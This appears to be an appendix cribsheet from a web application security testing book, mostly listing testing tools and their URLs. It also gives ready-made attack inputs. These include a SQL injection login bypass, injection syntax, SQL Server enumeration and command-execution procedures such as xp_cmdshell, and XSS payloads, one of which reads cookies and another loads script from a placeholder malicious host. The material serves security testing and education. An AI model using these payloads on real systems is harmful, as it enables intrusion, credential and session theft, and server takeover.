Appendix B: Web Hacking Tools and Techniques Cribsheet

We've discussed numerous tools and techniques in this book for assessing the security of web applications. This appendix summarizes the most important of these in an abbreviated format designed for use in the field. It is structured around the web hacking methodology that comprises the chapters of this book.

Web Browsers and Open Proxies

Internet Explorer

http://www.microsoft.com/ windows /ie/

Firefox

http://www.mozilla.com/firefox/

Open HTTP/S Proxies

http://www.publicproxyservers.com/

IE Extensions for HTTP/S Analysis

TamperIE

http://www.bayden.com/

IEWatch

http://www.iewatch.com

IE Headers

http://www.blunck. info /iehttpheaders.html

IE Developer Toolbar

Search http://www.microsoft.com

IE 5 Powertoys for

http://www.microsoft.com/windows/ie/previous/

WebDevs

webaccess/webdevaccess.mspx

Firefox Extensions for HTTP/S Analysis

LiveHTTP Headers

http://livehttpheaders.mozdev.org/

Tamper Data for

http://tamperdata.mozdev.org

Modify Headers

http://modifyheaders.mozdev.org

Web Developer Extension for Firefox

http://chrispederick.com/work/webdeveloper/

HTTP/S Proxy Tools

Burp Intruder

http://portswigger.net/intruder/

Fiddler HTTP Debugging Proxy

http://www.fiddlertool.com

OWASP WebScarab

http://www.owasp.org

Paros Proxy

http://www.parosproxy.org

Watchfire PowerTools

http://www.watchfire.com/securityzone/product/powertools.aspx

Sample Web Applications for Security Testing

OWASP/Foundstone SiteGenerator

http://owasp.net/forums/thread/428.aspx

OWASP WebGoat

http://www.owasp.org/software/webgoat.html

Foundstone Hacme Bank

http://www.foundstone.com/resources/proddesc/hacmebank.htm

Foundstone Hacme Books

http://www.foundstone.com/resources/proddesc/hacmebooks.htm

Command-line Tools

curl

http://curl.haxx.se/

Netcat

http://www.securityfocus.com/tools

Sslproxy

http://www.obdev.at/products/ssl-proxy/

OpenSSL

http://www.openssl.org/

Stunnel

http://www.stunnel.org/

Crawling Tools

Offline Explorer Pro

http://www.metaproducts.com/

Lynx

http://lynx.browser.org/

Wget

http://www.gnu.org/directory/wget.html

Wget for Windows

http://www.interlog.com/~tcharron/wgetwin.html

Teleport Pro

http://www.tenmax.com/teleport/pro/home.htm

Black Widow

http://www.softbytelabs.com/BlackWidow/

Free Web Application Security Scanners

Nikto

http://www.cirt.net/code/nikto.shtml

N-Stalker NStealth Free Edition

http://www.nstalker.com

Burp Suite

http://www.portswigger.net

Paros Proxy

http://www.parosproxy.org

OWASP WebScarab

http://www.owasp.org

Commercial Web Application Security Scanners and Services

Acunetix Enterprise Web Vulnerability Scanner

http://www.acunetix.com

Cenzic Hailstorm

http://www.cenzic.com

Ecyware GreenBlue Inspector

http://www.ecyware.com

Syhunt Sandcat Suite

http://www.syhunt.com

SPI Dynamics WebInspect

http://www.spidynamics.com

Watchfire AppScan

http://www.watchfire.com

NTObjectives NTOSpider

http://www.ntobjectives.com

Compuware DevPartner SecurityChecker

http://www.compuware.com

WhiteHat Security

http://www.whitehatsec.com

Code Analysis Tools

Jad, the Java decompiler

http://www.kpdus.com/jad.html

Inspector (formerly Bugscan)

http://www.hbgary.com

CodeAssure

http://www.securesw.com/products/

DevInspect

http://www.spidynamics.com/

Flawfinder

http://www.dwheeler.com/flawfinder/

RATS

http://www.securesw.com/resources/tools.html

SPLINT

http://lclint.cs. virginia .edu/

FXCop

http://www.gotdotnet.com/team/fxcop/

ITS4

http://www. cigital .com/

PREfast

Available in Microsoft Visual Studio 2005

Prexis

http://www.ouncelabs.com/

Coverity

http://www.coverity.com

DevPartner SecurityChecker

http://www.compuware.com/

Inspector (formerly Bugscan)

http://www.hbgary.com

Binary Analysis

Open Reverse Engineering Code

http://www.openrce.org

Ollydbg

http://www.ollydbg.de

OllydbgDiscussionForum

http://community. reverse-engineering .net

IDA Pro

http://www.datarescue.com

Profiling Tools and Techniques

Httprint, the web server fingerprinting tool

http://net-square.com/httprint/

Site Digger

http://www.foundstone.com/resources/proddesc/sitedigger.htm

Wayback Machine

http://web.archive.org

Google search using "+ www.victim.+com"

Identifying web application structure

Google search using " related :www.victim.com"

Related web sites

Google search using "parent directory" robots.txt

Finding robots.txt file

Authentication

Task

Tool/Technique

Resource

Local NTLM proxy

NTLM Authentication Proxy Server (APS)

http://www.geocities.com/rozmanov/ntlm/

Automated password guessing

WebCracker

http://online.securityfocus.com/tools/706

Automated password guessing

Brutus AET2

http://www.hoobie.net/brutus/index.html

Automated password guessing

Hydra

http://www.thc.org

CAPTCHA decoder

PWNtcha

http://sam.zoy.org/pwntcha/

Defeating SQL-based authentication

Using a known username, enter FOO' OR 1 = 1 -- in password field

NA

Authorization/Session Management

Task

Tool/Technique

Resource

Cookie analysis

CookieSpy

http://camtech2000.net/Pages/CookieSpy.html

Base64 encode/decode

Perl MIME::Base64

http://search.cpan.org/search?mode=module&query=MIME%3A%3ABase64

MD5 encoding

Perl Digest::MD5 module

http://search.cpan.org/search?mode=module&query=Digest%3A%3AMD5

DES encryption/ decryption

mcrypt

http://mcrypt.hellug.gr/

DES encryption/ decryption

Perl Crypt::DES module

http://search.cpan.org/search?mode=module&query=Crypt%3A%3ADES

WebDAV Tools

Cadaver, command-line WebDAV client for UNIX/Linux

http://www.webdav.org/cadaver/

WebDAV client and server software implementations , listed by University of California, Irvine

http://www.ics.uci.edu/~ejw/authoring/implementation.html

Web Services/SOAP Tools

Web Service Studio

http://www.gotdotnet.com/team/tools/web_svc/default.aspx

SOAP Tools

http:// soapclient .com/SoapTools.html

WSDigger

http://www.foundstone.com/resources/proddesc/wsdigger.htm

Input Validation

Task

Tool/Technique

Resource

Cross-site scripting tests

XSS Cheat Sheet by RSnake

http://ha.ckers.org/xss.html

Buffer overflow testing

NTOMax

http://www.foundstone.com

Fuzzing

SPIKE Proxy

http://www.immunitysec.com

Fuzzing

SPI Fuzzer

http://www.spidynamics.com

Security Library

DevInspect and SecureObjects

http://www.spidynamics.com

Popular Characters to Test Input Validation

Character

URL Encoding

Comments

'

%27

The mighty tick mark (apostrophe), absolutely necessary for SQL injection, produces informational errors

;

%3b

Command separator, line terminator for scripts

[null]

%00

String terminator for file access, command separator

[return]

%0a

Command separator

+

%2b

Represents [space] on the URL, good in SQL injection

<

%3c

Opening HTML tag

>

%3e

Closing HTML tag

%

%25

Useful for double decode, search fields; signifies

   

ASP, JSP tag

?

%3f

Signifies PHP tag

=

%3d

Place multiple equal signs in a URL parameter

(

%28

SQL injection

)

%29

SQL injection

[space]

%20

Necessary for longer scripts

.

%2e

Directory traversal, file access

/

%2f

Directory traversal

SQL Formatting Characters

Description

'

Terminates a statement.

--

Single line comment. Ignores the remainder of the statement.

+

Space. Required to correctly format a statement.

,@variable

Appends variables . Helps identify stored procedures.

?Param1=foo&Param1=bar

Creates "Param=foo, bar". Helps identify stored procedures.

@@@variable

Call an internal server variable.

PRINT

Returns an ODBC error but does not target data.

SET

Assigns variables. Useful for multiline SQL statements.

%

A wild card that matches any string of zero or more characters.

Basic SQL Injection Syntax

Query Syntax

Result

OR 1=1

Creates true condition for bypassing logic checks.

UNION ALL SELECT field FROM table WHERE condition

Retrieves all rows from a table if condition is true (e.g., 1=1).

INSERT INTO Users VALUES('neo', 'trinity')

Can bypass authentication.

Useful MS SQL Server Variables

@@@language

@@microsoftversion

@@ servername

@@servicename

@@version

Stored Procedures for Enumerating SQL Server

Stored Procedure

Description

sp_columns <table>

Most importantly, returns the column names of a table.

sp_configure [ name ]

Returns internal database settings. Specify a particular setting to retrieve just that valuefor example, sp_ configure 'remote query timeout (s)'.

sp_dboption

Views (or sets) user -configurable database options.

sp_depends <object>

Lists the tables associated with a stored procedure.

sp_helptext <object>

Describes the object. This is more useful for identifying areas where you can execute stored procedures. It rarely executes successfully.

sp_helpextendedproc

Lists all extended stored procedures.

sp_spaceused [object]

With no parameters, returns the database name(s), size , and unallocated space. If an object is specified, it will describe the rows and other information as appropriate.

sp_who2 [username]

Displays usernames, the host from which they've

(and sp_who)

connected, the application used to connect to the database, the current command executed in the database, and several other pieces of information. Both procedures accept an optional username. This is an excellent way to enumerate a SQL database's users as opposed to application users.

MS SQL Parameterized Extended Stored Procedures

Extended Stored Procedure

Description

xp_cmdshell <command>

The equivalent of cmd.exein other words, full command-line access to the database server. Cmd.exe is assumed, so you would only need to enter dir to obtain a directory listing. The default current directory is the %SYSTEMROOT%\System32.

xp_regread <rootkey>, <key>, <value>

Reads a registry value.

xp_reg*

There are several other registry-related procedures. Reading a value is the most useful.

xp_servicecontrol <action>, <service>

Starts or stops a Windows service.

xp_terminate_process <PID>

Kills a process based on its process ID.

MS SQL Nonparameterized Extended Stored Procedures

Extended Stored Procedure

Description

xp_loginconfig

Displays login information, particularly the login mode (mixed, etc.) and default login.

xp_logininfo

Shows currently logged-in accounts. Only applies to NTLM accounts.

xp_msver

Lists SQL version and platform information.

xp_enumdsn

Enumerates ODBC data sources.

xp_enumgroups

Enumerates Windows groups.

xp_ntsec_enumdomains

Enumerates domains present on the network.

SQL System Table Objects

System Table Object

Description

syscolumns

All column names and stored procedures for the current database, not just the master.

sysobjects

Every object (such as stored procedures) in the database.

sysusers

All of the users who can manipulate the database.

sysfiles

The filename and path for the current database and its log file.

systypes

Data types defined by SQL or new types defined by users.

Default SQL Master Database Tables

Master Database Table

Description

sysconfigures

Current database configuration settings.

sysdevices

Enumerates devices used for databases, logs, and temporary files.

syslogins

Enumerates user information for each user permitted to access the database.

sysremotelogins

Enumerates user information for each user permitted to remotely access the database or its stored procedures.

sysservers

Lists all peers that the server can access as an OLE database server.

Common Ports Used for Web Management

Port

Typical Service

21

FTP for file transfer

22

Secure Shell (SSH) for remote management

23

Telnet for remote management

80

World Wide Web standard port

81

Alternate WWW

88

Alternate WWW (also Kerberos)

443

HTTPS

900

IBM Websphere administration client

2301

Compaq Insight Manager

2381

Compaq Insight Manager over HTTPS

4242

Microsoft Application Center Management

7001

BEA Weblogic administration

7002

BEA Weblogic administration over SSL

7070

Sun Java Web Server over SSL

8000

Alternate web server or web cache

8001

Alternate web server or management

8005

Apache Tomcat

8080

Alternate web server, or Squid cache control (cachemgr.cgi), or Sun Java Web Server

8100

Allaire JRUN

88x0

Ports 8810, 8820, 8830, and so on usually belong to ATG Dynamo

8888

Alternate web server

9090

Sun Java Web Server admin module

10,000

Netscape Administrator interface (default)

Denial of Service

DDoS Attacks/tools compiled by David Dittrich

http://staff.washington.edu/dittrich/misc/ddos/

DoS Tools and Techniques

http://www.antiserver.it/Denial-Of-Service/

Client-side Analysis

Task

Tool/Technique

Resource

Cross-site scripting testing

ScreamingCSS

http://www.devitry.com/screamingCSS.html

Cross-site scripting testing

Injecting an IFRAME

<iframe src="[link_to_ executable_content]"></ iframe>

Cross-site scripting testing

Injecting a META REFRESH

<META HTTP-EQUIV= Refresh CONTENT="1; URL=http://redirect_to_here.com/">

Cross-site scripting testing

Inject script elements

<script>document.write(d ocument.cookie)</ script><script>alert('Salut! ')</script> <script src="http://www.malicious-host.foo/badscript.js"></script>

HTML injection

Inject script using style

<div style= "background:url('javascrip t:alert(1)')">



Hacking Exposed Web Applications
HACKING EXPOSED WEB APPLICATIONS, 3rd Edition
ISBN: 0071740643
EAN: 2147483647
Year: 2006
Pages: 127

flylib.com © 2008-2017.
If you may any questions please contact us: flylib@qtcs.net